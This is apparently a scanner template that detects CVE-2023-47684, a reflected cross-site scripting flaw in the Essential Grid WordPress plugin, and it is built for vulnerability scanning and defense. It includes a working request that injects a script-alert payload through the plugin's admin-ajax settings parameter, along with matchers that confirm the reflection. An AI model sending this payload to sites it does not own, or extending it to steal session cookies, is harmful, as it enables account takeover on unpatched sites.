漏洞描述
Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in ThemePunch OHG Essential Grid plugin <= 3.1.0 versions.
id: CVE-2023-47684
info:
name: Essential Grid <= 3.1.0 - Cross-Site Scripting
author: 0xpugal
severity: medium
description: |
Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in ThemePunch OHG Essential Grid plugin <= 3.1.0 versions.
impact: |
Unauthenticated attackers can inject malicious JavaScript via reflected XSS, potentially stealing user session cookies or performing actions on behalf of users.
remediation: |
Update Essential Grid plugin to version 3.1.1 or later.
reference:
- https://patchstack.com/database/vulnerability/essential-grid/wordpress-essential-grid-plugin-3-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2023-47684
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-47684
cwe-id: CWE-79
epss-score: 0.01704
epss-percentile: 0.81893
cpe: cpe:2.3:a:themepunch:essential_grid:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: themepunch
product: essential_grid
framework: wordpress
publicwww-query: "essential-grid-plugin"
tags: cve,cve2023,wordpress,wp,xss,wp-theme,essential-grid,themepunch,vuln
http:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain);</script>"
- "lightbox"
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100f6b6b56039f3aabef2b78a4bcd4bf3541e66424f1d5646a4cab66b4617d2379c022100ce51d5b6bfdfe7a296980a5ab4375acb8861dd40b651fe2f3b99b3cdf7feaf58:922c64590222798bb761d5b6d8e72950